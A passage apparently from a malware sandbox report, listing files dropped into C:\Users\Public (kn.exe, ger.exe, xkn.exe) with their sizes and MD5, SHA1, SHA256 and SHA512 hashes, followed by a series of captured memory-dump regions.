5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
C:\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\ger.exe

Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2204-75-0x0000000000400000-0x00000000004F5000-memory.dmp

Filesize
980KB

Download
memory/2356-100-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-105-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-97-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-101-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-95-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2356-104-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-103-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-102-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-113-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-112-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-129-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-120-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2356-128-0x000000001AFA0000-0x000000001B022000-memory.dmp

Filesize
520KB

Download
memory/2636-44-0x0000000000390000-0x0000000000398000-memory.dmp

Filesize
32KB

Download
memory/2636-43-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download